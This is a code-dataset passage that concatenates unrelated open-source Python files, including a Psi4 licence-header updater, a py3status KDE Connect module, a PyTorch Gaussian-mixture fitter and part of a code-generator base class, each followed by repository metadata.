      return S_ERROR(getattr(e, 'code', errno.EINVAL), "%s %s" % (errStr, repr(e)))
    # Sizes reported by SRM are in bytes.
    sTokenDict = {}
    sTokenDict['Total'] = float(occupancyDict.get('totalsize', '0'))
    sTokenDict['Free'] = float(occupancyDict.get('unusedsize', '0'))
    sTokenDict['SpaceReservation'] = self.protocolParameters['SpaceToken']
    return S_OK(sTokenDict)
|
andresailer/DIRAC
|
Resources/Storage/GFAL2_SRM2Storage.py
|
Python
|
gpl-3.0
| 8,520
|
[
"DIRAC"
] |
de38fc3ba57e6eb487bf1a6cca61f037bd1addd8bdeba7b2a267d416534f6e3a
|
# Checks all psi4 relevant files for proper boilerplate GNU license.
# This is sold as is with no warranty -- probably should double check everything
# after running. I am not responsible if you break Psi4.
#
# Do not forget to do share/plugins by hand!
import os
# File type we know how to handle
ftypes = ['cc', 'h', 'py']
c_header ="""/*
* @BEGIN LICENSE
*
* Psi4: an open-source quantum chemistry software package
*
* Copyright (c) 2007-2018 The Psi4 Developers.
*
* The copyrights for code used from other parties are included in
* the corresponding files.
*
* This file is part of Psi4.
*
* Psi4 is free software; you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation, version 3.
*
* Psi4 is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License along
* with Psi4; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*
* @END LICENSE
*/"""
py_header = c_header.replace(' */', '#')
py_header = py_header.replace('/*', '#')
py_header = py_header.replace(' *', '#')
c_header = c_header.splitlines()
py_header = py_header.splitlines()
def check_header(infile):
    """Rewrite the license block of *infile* with the current boilerplate.

    Locates the '@BEGIN LICENSE'/'@END LICENSE' markers ('#' style for .py
    files, '/* ... */' style otherwise), sanity-checks that the enclosed text
    really looks like the Psi4 license, then splices in the canonical header
    defined at module level (c_header / py_header). Prints a diagnostic and
    leaves the file untouched when the block cannot be located or verified.
    """
    # Derive the kind of comment syntax from the file's own extension.
    # (The original read the module-level loop variable `filename`, which
    # broke any standalone call of this function.)
    ext = infile.split('.')[-1]
    with open(infile, 'r+') as f:
        data = f.read().splitlines()
        # Find the header location. .index raises ValueError when a marker is
        # missing; a marker on the first/last line can push start/end out of
        # range, hence IndexError as well.
        try:
            if ext == 'py':
                start = data.index("# @BEGIN LICENSE") - 1
                end = data.index("# @END LICENSE") + 1
                if data[start] != '#' or data[end] != '#':
                    print('Did not find "wings" of license block in file %s' % infile)
                    return
            else:
                start = data.index(" * @BEGIN LICENSE") - 1
                end = data.index(" * @END LICENSE") + 1
                if data[start] != '/*' or data[end] != ' */':
                    print('Did not find "wings" of license block in file %s' % infile)
                    return
        except (ValueError, IndexError):
            print('Could not find license block in file %s' % infile)
            return
        # Make sure the block actually looks like a license
        license = data[start:end + 1]
        top = any("PSI4:" in x.upper() for x in license[:5])
        bot = any("51 Franklin Street" in x for x in license[5:])
        if not (top and bot):
            print('Did not understand infile %s' % infile)
            return
        # Replace license with the canonical module-level header.
        if ext in ('cc', 'h'):
            data[start:end + 1] = c_header
        elif ext == 'py':
            data[start:end + 1] = py_header
        else:
            print('Did not understand infile end: %s' % infile)
            return
        # Write it out in place, truncating any leftover tail.
        f.seek(0)
        f.write("\n".join(data))
        f.truncate()
# Directories whose paths contain these substrings are skipped entirely
# (vendored / third-party code we must not relicense).
avoid_strings = ['qcdb', 'libJKFactory']
# Walk both the C++ sources and the Python tree.
walk = list(os.walk('../../src/'))
walk += list(os.walk('../python'))
for root, dirnames, filenames in walk:
    if any(x in root for x in avoid_strings):
        continue
    for filename in filenames:
        # NOTE: `filename` is a module-level name here and check_header has
        # historically read it as a global — do not rename without checking.
        if filename.split('.')[-1] not in ftypes:
            continue
        check_header(root + '/' + filename)
|
amjames/psi4
|
psi4/share/psi4/scripts/apply_license.py
|
Python
|
lgpl-3.0
| 3,497
|
[
"Psi4"
] |
b2167c6ea3755a044afa2588075c5efa3e8dd2bdcabe71c2a1ed7242e89f9667
|
"""
Display information about your smartphone with KDEConnector.
Configuration parameters:
cache_timeout: how often we refresh this module in seconds (default 30)
device: the device name, you need this if you have more than one device
connected to your PC (default None)
device_id: alternatively to the device name you can set your device id here
(default None)
format: see placeholders below
(default '{name}{notif_status} {bat_status} {charge}%')
format_disconnected: text if device is disconnected
(default 'device disconnected')
    low_threshold: percentage value below which the text switches to color_bad
(default 20)
status_bat: text when battery is discharged (default '⬇')
status_chr: text when device is charged (default '⬆')
status_full: text when battery is full (default '☻')
status_no_notif: text when you have no notifications (default '')
status_notif: text when notifications are available (default ' ✉')
Format placeholders:
{bat_status} battery state
{charge} the battery charge
{name} name of the device
{notif_size} number of notifications
{notif_status} shows if a notification is available or not
Color options:
color_bad: Device unknown, unavailable
or battery below low_threshold and not charging
color_degraded: Connected and battery not charging
color_good: Connected and battery charging
Requires:
pydbus: pythonic d-bus library
kdeconnect: adds communication between kde and your smartphone
Examples:
```
kdeconnector {
device_id = "aa0844d33ac6ca03"
format = "{name} {battery} ⚡ {state}"
low_battery = "10"
}
```
@author Moritz Lüdecke
SAMPLE OUTPUT
{'color': '#00FF00', 'full_text': u'Samsung Galaxy S6 \u2709 \u2B06 97%'}
charging
{'color': '#00FF00', 'full_text': u'Samsung Galaxy S6 \u2B06 97%'}
transition
{'color': '#FFFF00', 'full_text': u'Samsung Galaxy S6 \u2B07 93%'}
not-plugged
{'color': '#FF0000', 'full_text': u'Samsung Galaxy S6 \u2B07 92%'}
disconnected
{'color': '#FF0000', 'full_text': u'device disconnected'}
unknown
{'color': '#FF0000', 'full_text': u'unknown device'}
"""
from pydbus import SessionBus
SERVICE_BUS = "org.kde.kdeconnect"
INTERFACE = SERVICE_BUS + ".device"
INTERFACE_DAEMON = SERVICE_BUS + ".daemon"
INTERFACE_BATTERY = INTERFACE + ".battery"
INTERFACE_NOTIFICATIONS = INTERFACE + ".notifications"
PATH = "/modules/kdeconnect"
DEVICE_PATH = PATH + "/devices"
BATTERY_SUBPATH = "/battery"
NOTIFICATIONS_SUBPATH = "/notifications"
UNKNOWN = "Unknown"
UNKNOWN_DEVICE = "unknown device"
UNKNOWN_SYMBOL = "?"
class Py3status:
    """
    """

    # available configuration parameters
    cache_timeout = 30
    device = None
    device_id = None
    format = "{name}{notif_status} {bat_status} {charge}%"
    format_disconnected = "device disconnected"
    low_threshold = 20
    status_bat = "⬇"
    status_chr = "⬆"
    status_full = "☻"
    status_no_notif = ""
    status_notif = " ✉"

    def post_config_hook(self):
        # D-Bus proxies, filled lazily by _init_dbus().
        self._bat = None
        self._dev = None
        self._not = None

    def _init_dbus(self):
        """
        Resolve the device id and bind the D-Bus proxies.

        Returns True when the device proxy could be obtained.
        """
        _bus = SessionBus()
        if self.device_id is None:
            self.device_id = self._get_device_id(_bus)
            if self.device_id is None:
                return False
        try:
            self._dev = _bus.get(SERVICE_BUS, DEVICE_PATH + f"/{self.device_id}")
            try:
                self._bat = _bus.get(
                    SERVICE_BUS, DEVICE_PATH + f"/{self.device_id}" + BATTERY_SUBPATH
                )
                self._not = _bus.get(
                    SERVICE_BUS,
                    DEVICE_PATH + f"/{self.device_id}" + NOTIFICATIONS_SUBPATH,
                )
            except Exception:
                # Fallback to the old version: battery/notifications live
                # on the device object itself (pre-split kdeconnect D-Bus API).
                self._bat = None
                self._not = None
        except Exception:
            return False
        return True

    def _get_device_id(self, bus):
        """
        Find the device id, either the only known device or the one
        whose name matches the `device` configuration parameter.
        """
        _dbus = bus.get(SERVICE_BUS, PATH)
        devices = _dbus.devices()
        if self.device is None and self.device_id is None and len(devices) == 1:
            return devices[0]
        for dev_id in devices:
            self._dev = bus.get(SERVICE_BUS, DEVICE_PATH + f"/{dev_id}")
            if self.device == self._dev.name:
                return dev_id
        return None

    def _get_isTrusted(self):
        """Return whether the device is paired/trusted (API changed in 1.0)."""
        if self._dev is None:
            return False
        try:
            # New method which replaced 'isPaired' in version 1.0
            return self._dev.isTrusted()
        except AttributeError:
            try:
                # Deprecated since version 1.0
                return self._dev.isPaired()
            except AttributeError:
                return False

    def _get_device(self):
        """
        Get the device info dict, or None when the proxy is unusable.
        """
        try:
            device = {
                "name": self._dev.name,
                "isReachable": self._dev.isReachable,
                "isTrusted": self._get_isTrusted(),
            }
        except Exception:
            return None
        return device

    def _get_battery(self):
        """
        Get the battery charge/charging state, or None on failure.
        """
        try:
            if self._bat:
                charge = self._bat.charge
                isCharging = self._bat.isCharging
            else:
                # Old API: battery methods on the device object.
                charge = self._dev.charge()
                isCharging = self._dev.isCharging()
            battery = {
                "charge": charge,
                "isCharging": isCharging == 1,
            }
        except Exception:
            return None
        return battery

    def _get_notifications(self):
        """
        Get the active notifications, or None on failure.

        Returns {"activeNotifications": <list>}; the previous version
        wrapped the dict a second time, so the notification count was
        always reported as 1.
        """
        try:
            if self._not:
                notifications = self._not.activeNotifications()
            else:
                notifications = self._dev.activeNotifications()
            notifications = {"activeNotifications": notifications}
        except Exception:
            return None
        return notifications

    def _get_battery_status(self, battery):
        """
        Map the battery dict to (charge, status symbol, color).
        """
        if not battery or battery["charge"] == -1:
            return (UNKNOWN_SYMBOL, UNKNOWN, "#FFFFFF")
        if battery["isCharging"]:
            status = self.status_chr
            color = self.py3.COLOR_GOOD
        else:
            status = self.status_bat
            color = self.py3.COLOR_DEGRADED
        if not battery["isCharging"] and battery["charge"] <= self.low_threshold:
            color = self.py3.COLOR_BAD
        if battery["charge"] > 99:
            status = self.status_full
        return (battery["charge"], status, color)

    def _get_notifications_status(self, notifications):
        """
        Map the notifications dict to (count, status symbol).
        """
        if notifications:
            size = len(notifications["activeNotifications"])
        else:
            size = 0
        status = self.status_notif if size > 0 else self.status_no_notif
        return (size, status)

    def _get_text(self):
        """
        Get the current metadatas: (formatted text, color).
        """
        device = self._get_device()
        if device is None:
            return (UNKNOWN_DEVICE, self.py3.COLOR_BAD)
        if not device["isReachable"] or not device["isTrusted"]:
            return (
                self.py3.safe_format(
                    self.format_disconnected, {"name": device["name"]}
                ),
                self.py3.COLOR_BAD,
            )
        battery = self._get_battery()
        (charge, bat_status, color) = self._get_battery_status(battery)
        notif = self._get_notifications()
        (notif_size, notif_status) = self._get_notifications_status(notif)
        return (
            self.py3.safe_format(
                self.format,
                dict(
                    name=device["name"],
                    charge=charge,
                    bat_status=bat_status,
                    notif_size=notif_size,
                    notif_status=notif_status,
                ),
            ),
            color,
        )

    def kdeconnector(self):
        """
        Get the current state and return it.
        """
        if self._init_dbus():
            (text, color) = self._get_text()
        else:
            text = UNKNOWN_DEVICE
            color = self.py3.COLOR_BAD
        response = {
            "cached_until": self.py3.time_in(self.cache_timeout),
            "full_text": text,
            "color": color,
        }
        return response
if __name__ == "__main__":
    """
    Run module in test mode.
    """
    # Exercise this module standalone with py3status's test harness.
    from py3status.module_test import module_test
    module_test(Py3status)
|
ultrabug/py3status
|
py3status/modules/kdeconnector.py
|
Python
|
bsd-3-clause
| 8,900
|
[
"Galaxy"
] |
202e286e9a69fad2f0b9b0ad646df17668e503e1bcd10be1e097de28c2596ba5
|
from setuptools import setup
import io
# read the contents of your README file
from os import path
# Read the package README so the long description renders as Markdown on PyPI.
this_directory = path.abspath(path.dirname(__file__))
readme_path = path.join(this_directory, 'README.md')
with io.open(readme_path, encoding='utf-8') as readme:
    long_description = readme.read()

# Gather all distribution metadata in one place, then hand it to setup().
metadata = dict(
    name='goodvibes',
    packages=['goodvibes'],
    version='3.1.0',
    description='A python program to compute corrections to thermochemical data from frequency calculations',
    long_description=long_description,
    long_description_content_type='text/markdown',
    author='Paton Research Group',
    author_email='robert.paton@colostate.edu',
    url='https://github.com/bobbypaton/goodvibes',
    download_url='https://github.com/bobbypaton/GoodVibes/archive/v3.0.1.zip',
    keywords=['compchem', 'thermochemistry', 'gaussian', 'vibrational-entropies', 'temperature'],
    classifiers=[],
    install_requires=["numpy", ],
    python_requires='>=2.6',
    include_package_data=True,
    entry_points={
        'console_scripts': [
            'goodvibes = goodvibes.GoodVibes:main',
        ],
    },
)
setup(**metadata)
|
bobbypaton/GoodVibes
|
setup.py
|
Python
|
mit
| 1,039
|
[
"Gaussian"
] |
bf29cff2efc2e7abd1eabf3c343006733dc9611eb4b49ed883b5b7e17cae15be
|
import numpy as np
import torch
from torch.autograd import Variable
from stats.tensor import tensor
def fit(pdfs, parameters, observations, iter, lr):
    """Estimates the parameters of a mixture model via maximum likelihood maximization.
    Uses gradient ascent on the mean log-likelihood; the mixing coefficients
    are tied to sum to one through a Lagrange-multiplier penalty term.
    Parameters
    ----------
    pdfs : List of callable pdfs
        Callable probability density functions (likelihood function)
        expecting an array of observations as the only argument.
    parameters : List of list
        List of list of parameters that are subject to optimization.
        e.g. for a bimodal gaussian mixture: [[mu_1, sigma_1], [mu_2, sigma_2]]
        NOTE: mutated in place -- a mixing-coefficient Variable is appended
        to each sub-list, so callers can read it back as parameters[k][-1].
    observations : ndarray
        Observations from an unknown pdf which parameters are subject to be estimated
    iter : float
        Maximum number of iterations (shadows the `iter` builtin; kept for
        interface compatibility)
    lr : float
        Gradient descent learning rate
    Returns
    -------
    Final value of the penalized mean log-likelihood (legacy-torch scalar
    via .data[0]).
    """
    # number of models/classes in mixture
    K = len(parameters)
    # initialize mixing coefficients with random values (normalized to sum to 1)
    mixcoeffs = np.random.rand(K)
    mixcoeffs /= np.sum(mixcoeffs)
    # make the coefficients visible to the update step
    for k in range(K):
        mixcoeff = Variable(tensor(mixcoeffs[k]), requires_grad=True)
        parameters[k].append(mixcoeff)
    for i in range(iter):
        likelihood = 0
        for k in range(K):
            # multiply the likelihood with the mixing coefficients
            # mixing coefficient: p(z_k = 1)
            p_z = parameters[k][-1].expand(observations.size())
            likelihood += pdfs[k](observations) * p_z
        expectation = torch.mean(torch.log(likelihood))
        # add constraint sum(mixcoeffs) = 1 via lagrange multiplier
        for k in range(K):
            expectation -= 1.0 * parameters[k][-1]
        expectation += 1.0 # c = 1
        if np.isnan(expectation.data[0]):
            # log of a zero likelihood — usually bad initial parameters
            raise RuntimeError('Singular state. Try different initial parameters')
        # Determine gradients
        expectation.backward()
        # Update parameters with gradient ASCENT (adds lr * grad: we maximize)
        for k in range(K):
            for param in parameters[k]:
                param.data.add_(lr * param.grad.data)
                param.grad.data.zero_()
    return expectation.data[0]
if __name__ == '__main__':
    from stats.distributions import Normal
    """
    Estimate mean and std of a gaussian mixture model via MixtureModel-MLE on Kx10000 observations
    """
    np.random.seed(0)
    # number of gaussian models in mixture
    K = 2
    pdfs = []
    params = []
    true_params = []
    xs = []
    for k in range(K):
        # Sample observations from a bimodal normal distribution function with different parameter
        true_mean = np.random.uniform(-10, 10)
        true_std = np.random.uniform(0.5, 3.0)
        xs.append(true_mean + np.random.randn(np.random.randint(500, 2000)) * true_std)
        # Define likelihood function of model, starting from a perturbed mean
        mean_estimate = Variable(tensor(true_mean+5.*np.random.randn()), requires_grad=True)
        std_estimate = Variable(tensor(1.0), requires_grad=True)
        pdfs.append(Normal(mean_estimate, std_estimate))
        params.append([mean_estimate, std_estimate])
        true_params.append([true_mean, true_std])
    # Pool all component samples into one observation vector
    x = np.concatenate(xs, axis=0)
    observations = Variable(tensor(x))
    log_likelihood = fit(pdfs, params, observations, iter=500, lr=0.1)
    print('Log likelihood: %7.5f' % log_likelihood)
    # params[k][2] is the mixing coefficient appended by fit()
    for k in range(K):
        print('k=%d mean=% 7.5f std=% 7.5f coeff=% 7.5f' % (k, params[k][0].data[0], params[k][1].data[0], params[k][2].data[0]))
    """
    Plot true and estimated distributions
    """
    import matplotlib.pyplot as plt
    n, _, _ = plt.hist(x, 100, normed=True)
    # plot distributions (closed-form normal pdf for the overlay curves)
    np_pdf = lambda x, mean, std: 1./np.sqrt(2.0*np.pi*std*std) * np.exp(- ((x-mean)**2) / (2.0 * std*std))
    xx = np.linspace(np.min(x), np.max(x), 1000)
    for k in range(K):
        true_y = np_pdf(xx, true_params[k][0], true_params[k][1])
        estimated_y = np_pdf(xx, params[k][0].data[0], params[k][1].data[0])
        plt.plot(xx, true_y, '-.', label='Target pdf k=%d'%(k+1))
        plt.plot(xx, estimated_y, '-', label='Estimated pdf %d' % (k+1))
    plt.legend()
    plt.show()
|
mlosch/pytorch-stats
|
stats/estimation/mm.py
|
Python
|
mit
| 4,418
|
[
"Gaussian"
] |
55dfb134ceed8504e41fff2bc120a02d8196db71ac7642fbdc0447660ff9e2f0
|
#!/usr/bin/env python
#
# @file BaseFile.py
# @brief base class for all files to be generated
# @author Frank Bergmann
# @author Sarah Keating
#
# <!--------------------------------------------------------------------------
#
# Copyright (c) 2013-2015 by the California Institute of Technology
# (California, USA), the European Bioinformatics Institute (EMBL-EBI, UK)
# and the University of Heidelberg (Germany), with support from the National
# Institutes of Health (USA) under grant R01GM070923. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Neither the name of the California Institute of Technology (Caltech), nor
# of the European Bioinformatics Institute (EMBL-EBI), nor of the University
# of Heidelberg, nor the names of any contributors, may be used to endorse
# or promote products derived from this software without specific prior
# written permission.
# ------------------------------------------------------------------------ -->
from util import global_variables, strFunctions
class BaseFile:
"""Common base class for all files"""
    def __init__(self, name, extension):
        """Create the file writer and open the output file.

        :param name: base name of the file to generate ('' opens nothing)
        :param extension: file extension without the dot, e.g. 'h' or 'cpp'
        """
        self.name = name
        self.extension = extension #For C++ example 'h'
        # derived members for file
        self.filename = name + '.' + extension
        if name != '':
            # NOTE(review): handle is kept open for the object's lifetime;
            # callers are expected to call close_file() when done.
            self.file_out = open(self.filename, 'w')
        # derived members for comments
        self.comment_start = '/**'
        self.comment = ' *'
        self.comment_end = '*/'
        # derived members for description
        if not hasattr(self, 'brief_description'):
            self.brief_description = "Base file"
        elif len(self.brief_description) == 0:
            self.brief_description = 'Base file'
        # derived members for spacing
        self.line_length = 79
        self.num_tabs = 0
        # populate useful variables
        if self.extension == 'h':
            self.is_header = True
        else:
            self.is_header = False
        # members that might get overridden if creating another library
        self.language = global_variables.language
        self.library_name = global_variables.library_name
        self.cap_language = self.language.upper()
        self.open_br = '{'
        self.close_br = '}'
        # members used here that will only come from some
        # instantiations of this base class
        # but it needs to know that it can resolve them
        self.class_name = ''
        self.package = ''
        self.class_object = dict()
########################################################################
# FUNCTIONS FOR WRITING LINES/COMMENTS
# based on the number of tabs and the length of line specified
# function to create lines of size specified
def create_lines(self, line, tabsize, is_comment=False):
max_length = self.line_length - tabsize
if max_length <= 0:
# we must have a line where the tabsize is so long
# multi did this with ListOfSpeciesTypeComponentMapsInProduct
max_length = self.line_length - 4
if is_comment:
max_length -= 3
lines = []
if len(line) == 0:
return lines
words = line.split()
num_words = len(words)
if num_words == 0:
lines.append(line)
elif num_words == 1:
lines.append(line)
else:
self.parse_lines(lines, words, max_length)
return lines
    @staticmethod
    def parse_lines(lines, words, max_length):
        """Greedy word-wrap of *words* into *lines*, each <= *max_length*.

        Tracks double-quote state so that a quoted string broken across
        lines is closed with '"' at the break and reopened with '"' on the
        continuation (C-style implicit string concatenation).
        Appends to *lines* in place; returns None.
        """
        num_words = len(words)
        in_quotes = False        # currently inside a double-quoted run
        quotes_closed = True     # the emitted text has balanced quotes
        reopen_quotes = False    # next continuation must start with '"'
        i = 1
        temp = words[0]
        if temp.startswith('\"'):
            in_quotes = True
        newline = words[0]
        while i < num_words:
            if len(newline) < max_length:
                # update quote state for the word about to be appended
                if not in_quotes:
                    if words[i].startswith('\"'):
                        in_quotes = True
                        quotes_closed = False
                        # check we dont also end
                        if words[i].endswith('\"'):
                            in_quotes = False
                            quotes_closed = True
                else:
                    if words[i].endswith('\"'):
                        in_quotes = False
                if len(temp) > 0:
                    temp = temp + ' ' + words[i]
                else:
                    if reopen_quotes:
                        temp = '\"' + words[i]
                        reopen_quotes = False
                    else:
                        temp = words[i]
                i += 1
                if len(temp) <= max_length:
                    if temp.endswith('\"'):
                        quotes_closed = True
                    newline = temp
                else:
                    # candidate overflows: flush what we have
                    if len(newline) == 0:
                        # single over-long word: emit it on its own line
                        if in_quotes or not quotes_closed:
                            temp += ' \"'
                            quotes_closed = True
                        if in_quotes and not quotes_closed:
                            reopen_quotes = True
                        lines.append(temp)
                        temp = ''
                    else:
                        rollback = True
                        if in_quotes:
                            if words[i-1] == '",':
                                # special case for validation rule messages
                                rollback = False
                                newline = temp
                            elif words[i-1].startswith('\"'):
                                # do not add the quotes as we are throwing
                                # the word away
                                in_quotes = False
                                quotes_closed = True
                            else:
                                newline += ' \"'
                                quotes_closed = True
                                reopen_quotes = True
                        elif not quotes_closed:
                            newline += ' \"'
                            quotes_closed = True
                            reopen_quotes = True
                        lines.append(newline)
                        newline = ''
                        temp = ''
                        if rollback:
                            # reprocess the word that did not fit
                            i -= 1
            else:
                # current line already full: flush it before continuing
                if in_quotes or not quotes_closed:
                    newline += ' \"'
                    quotes_closed = True
                    reopen_quotes = True
                lines.append(newline)
                newline = ''
                temp = ''
        if len(newline) > 0:
            lines.append(newline)
# write line without worrying about size
def write_line_verbatim(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}\n'.format(tabs, line))
def write_jsbml_line_verbatim(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1};\n'.format(tabs, line))
# write line without worrying about size
def copy_line_verbatim(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}'.format(tabs, line))
# functions for writing lines indenting each new line
def write_line(self, line, space=0):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
for i in range(0, space):
tabs += ' '
lines = self.create_lines(line, len(tabs))
for i in range(0, len(lines)):
self.file_out.write('{0}{1}\n'.format(tabs, lines[i]))
tabs += ' '
# functions for writing lines without indenting each new line
def write_line_no_indent(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
lines = self.create_lines(line, len(tabs))
for i in range(0, len(lines)):
self.file_out.write('{0}{1}\n'.format(tabs, lines[i]))
# function to write a line preserving with indenting
def write_spaced_line(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}\n'.format(tabs, line))
# function for blankLines
def skip_line(self, num=1):
for i in range(0, num):
self.file_out.write('\n')
# functions for writing comments
def write_comment_line(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
lines = self.create_lines(line, len(tabs), True)
for i in range(0, len(lines)):
self.file_out.write('{0}{1} {2}\n'
.format(tabs, self.comment, lines[i]))
def write_blank_comment_line(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}\n'.format(tabs, self.comment))
def open_comment(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}\n'.format(tabs, self.comment_start))
def close_comment(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0} {1}\n'.format(tabs, self.comment_end))
def write_doxygen_start(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('\n{0}{1} @cond doxygen{2}Internal {3}\n\n'
.format(tabs, self.comment_start,
self.library_name,
self.comment_end))
def write_doxygen_end(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('\n{0}{1} @endcond {2}\n\n'
.format(tabs, self.comment_start,
self.comment_end))
# function for the library extern declaration
def write_extern_decl(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}_EXTERN\n'
.format(tabs, self.library_name.upper()))
########################################################################
# Function to copy from another file verbatim
def copy_additional_file(self, filename):
in_file = open(filename, 'r')
for line in in_file:
self.file_out.write('{0}'.format(line))
in_file.close()
########################################################################
# Functions to alter the number of tabs being used in writing lines
def up_indent(self, num=1):
self.num_tabs += num
def down_indent(self, num=1):
self.num_tabs -= num
# just checking
if self.num_tabs < 0:
self.num_tabs = 0
########################################################################
# File access functions
    def close_file(self):
        """Close the output file handle opened in __init__."""
        self.file_out.close()
########################################################################
# Default write file with standard header and licence
    def write_file(self):
        """Default file write: emit the standard header/licence comment.
        Subclasses extend this with their own content."""
        self.add_file_header()
    def write_licence(self):
        """Write the licence comment block: opening rule, the appropriate
        copyright notice(s), the GPL paragraph and the closing rule."""
        self.write_blank_comment_line()
        self.write_comment_line('<!-----------------------------------------'
                                '---------------------------------')
        # copyright can be any of the following:
        # libsbml copyright
        # libsbml copyright plus custom copyright
        # custom copyright
        if global_variables.library_name == 'Libsbml':
            # we are writing code for libsbml include the copyright
            self.write_libsbml_copyright()
            if global_variables.custom_copyright \
                    and len(global_variables.custom_copyright) > 0:
                # we have a custom copyright as well
                # add it
                self.write_blank_comment_line()
                self.write_custom_copyright()
        else:
            # we are writing code for something else
            if not global_variables.custom_copyright \
                    or len(global_variables.custom_copyright) == 0:
                # no copyright given so write the libsbml one
                self.write_libsbml_copyright()
            else:
                self.write_custom_copyright()
        self.write_gpl_licence()
        self.write_comment_line('--------------------------------------------'
                                '---------------------------- -->')
    def write_gpl_licence(self):
        """Write the LGPL licence paragraph as a wrapped comment block."""
        self.write_blank_comment_line()
        self.write_comment_line('This library is free software; you can '
                                'redistribute it and/or modify it under the '
                                'terms of the GNU Lesser General Public '
                                'License as published by the Free Software '
                                'Foundation. A copy of the license agreement'
                                ' is provided in the file named "LICENSE.txt"'
                                ' included with this software distribution '
                                'and also available online as http://sbml.org'
                                '/software/libsbml/license.html')
def write_custom_copyright(self):
filename = global_variables.custom_copyright
in_file = open(filename, 'r')
for line in in_file:
self.write_comment_line('{0}'.format(line))
in_file.close()
    def write_libsbml_copyright(self):
        """Write the multi-era libSBML copyright notice as comment lines."""
        self.write_comment_line('This file is part of libSBML. Please visit '
                                'http://sbml.org for more information about '
                                'SBML, and the latest version of libSBML.')
        self.write_blank_comment_line()
        self.write_comment_line('Copyright (C) 2013-2016 jointly by the '
                                'following organizations:')
        self.write_comment_line(' 1. California Institute of Technology, '
                                'Pasadena, CA, USA')
        self.write_comment_line(' 2. EMBL European Bioinformatics '
                                'Institute (EMBL-EBI), Hinxton, UK')
        self.write_comment_line(' 3. University of Heidelberg, Heidelberg, '
                                'Germany')
        self.write_blank_comment_line()
        self.write_comment_line('Copyright (C) 2009-2013 jointly by the '
                                'following organizations:')
        self.write_comment_line(' 1. California Institute of Technology, '
                                'Pasadena, CA, USA')
        self.write_comment_line(' 2. EMBL European Bioinformatics '
                                'Institute (EMBL-EBI), Hinxton, UK')
        self.write_blank_comment_line()
        self.write_comment_line('Copyright (C) 2006-2008 by the California '
                                'Institute of Technology,')
        self.write_comment_line(' Pasadena, CA, USA ')
        self.write_blank_comment_line()
        self.write_comment_line('Copyright (C) 2002-2005 jointly by the '
                                'following organizations:')
        self.write_comment_line(' 1. California Institute of Technology, '
                                'Pasadena, CA, USA')
        self.write_comment_line(' 2. Japan Science and Technology Agency, '
                                'Japan')
    def add_file_header(self):
        """Write the doxygen file header comment block.

        Emits @file/@brief/@author tags, the licence (except for xml/rng
        outputs), and — for header files not in the excluded list — the
        class-level doc comment matching the class kind (Extension,
        Plugin, Validator, or plain class).
        """
        self.open_comment()
        self.write_comment_line('@file {0}'.format(self.filename))
        self.write_comment_line('@brief {0}'.format(self.brief_description))
        if global_variables.is_package:
            self.write_comment_line('@author SBMLTeam')
        else:
            self.write_comment_line('@author DEVISER')
        # xml/rng outputs have no code licence header
        if self.extension != 'xml' and self.extension != 'rng':
            self.write_licence()
        if self.is_header and not self.is_excluded(self.name):
            # dispatch on the class-name suffix to pick the comment flavour
            if self.name.endswith('Extension'):
                self.write_class_comments(True, False, False)
            elif self.name.endswith('Plugin'):
                self.write_class_comments(False, True, False)
            elif self.name.endswith('Validator'):
                self.write_class_comments(False, False, True)
            else:
                self.write_class_comments(False, False, False)
        self.close_comment()
    def write_class_comments(self, extension, plugin, validator):
        """Write the doxygen @class/@sbmlbrief comments for this class.

        Exactly one of *extension*, *plugin*, *validator* selects the
        comment flavour; if none is set a generic TODO brief is emitted.
        """
        fullname = global_variables.package_full_name
        up_package = strFunctions.upper_first(self.package)
        validator_class_comment = 'The {0} class extends the ' \
                                  'Validator class from core libSBML to ' \
                                  'apply validation to the constructs ' \
                                  'introduced by the SBML Level 3 ' \
                                  '{1} package. This class then acts as a ' \
                                  'base class for any validators that ' \
                                  'apply rules to the &ldquo;{2}&rdquo; ' \
                                  'package specification constructs or to ' \
                                  'entire models that use the &ldquo;{2}' \
                                  '&rdquo; package, and may therefore be ' \
                                  'subject to other global restrictions ' \
